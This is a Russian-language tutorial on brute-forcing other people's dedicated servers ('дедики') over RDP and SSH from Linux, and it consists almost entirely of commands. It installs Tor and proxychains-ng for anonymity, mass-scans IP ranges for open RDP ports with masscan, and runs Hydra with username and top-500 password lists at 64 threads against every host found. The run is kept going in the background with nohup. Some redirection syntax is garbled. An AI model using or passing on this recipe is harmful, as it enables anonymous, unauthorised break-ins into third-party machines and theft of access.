Брут дедиков в Linux | ProxyChains-NG + Masscan + Hydra | Брут SSH-тоннелей | Брутфорс RDP
Брутим дедики из-под Linux.
ProxyChains-NG + Masscan + Hydra.
# yum update
cd ~
Установим необходимые репозитории
# yum -y install epel-release
Поскольку для анонимности мы будем использовать Tor,
то установим необходимые пакеты, которые нам понадобяться, а также нам пригодятся сетевые утилиты:
# yum -y install torsocks tor mc git net-tools.x86_64
В самый конец файла /etc/tor/torrc добавьте строки:
# mcedit /etc/tor/torrc
AutomapHostsOnResolve 1
DNSPort 53530
TransPort 9040
Запустите и добавьте в автозапуск службу Tor:
# systemctl start tor
# systemctl enable tor
Проверяем слушается ли наш порт:
# netstat -an | grep -i listen
Устанавливаем proxychains
Просматриваем какие группы есть ?
# yum grouplist
Для начала установим Development Tools.
# yum groups install "Development Tools"
# git clone https://github.com/rofl0r/proxychains-ng.git
# cd proxychains-ng/
# ./configure --prefix=/usr --sysconfdir=/etc
# make
# make install
# make install-config
# cd .. && rm -rf proxychains-ng
Установка masscan :
# yum search masscan
# yum -y install masscan
Сканирование.
У masscan есть несколько удобных выходных форматов, таких как бинарный файл и XML.
Но сейчас нам нужен текстовый
Запускаем сканирование на выходе будет читый список IPs:
# masscan -iL ranges.txt -p3389 --rate=1000 |awk '{print $6}' result.txt
Перед каждой командой masscan нам нужно добавлять proxychains4,
Тогда сканирование будет производиться через Tor:
# proxychains4 masscan -iL ranges.txt -p3389 --rate=1000 |awk '{print $6}' = result.txt
Установка hydra :
# yum -y install hydra
Кстати, для пользователей Linux доступен графический интерфейс (GTK gui), для его запуска наберите
# yum -y install xhydra
Использование Hydra в командной строке
Проверим, имеет ли модуль дополнительные параметры
# hydra -U rdp
Брут RDP :
# proxychains4 masscan -iL ranges.txt -p3389 --rate=1000 |awk '{print $6}' = resultrdp.txt
# hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050
Чтобы закрыть терминал, но при этом оставить работать запущенную из него программу:
Для запуска программ в фоновом режиме следует использовать утилиту nohup:
# nohup hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050
В этом случае запущенный скрипт останется работать даже при отключении от сервера,
но весь выводимый скриптом текст будет записываться в файл nohup.log,
создаваемый в текущем каталоге, о чем nohup непосредственно и информирует сообщением nohup:
appending output to nohup.out. При этом данный файл будет создан даже в том случае,
если у скрипта никогда не будет никакого вывода.
Чтобы nohup.log никогда не создавался, перенаправляем stdout скрипта в /dev/null:
# nohup hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050 /dev/null & exit
Для того, чтоб после посмотреть работает ли гидра выполни:
# ps ax
или
# ps ax | grep hydra
● Дополнительные хештеги: #компьютер #pc #codeby #hack #brute #danger #хакеры #мотивация #internet #дедик #dedic #брут #брутфорс #пароль #атака #Взлом #hydra #SSH #SSH-туннель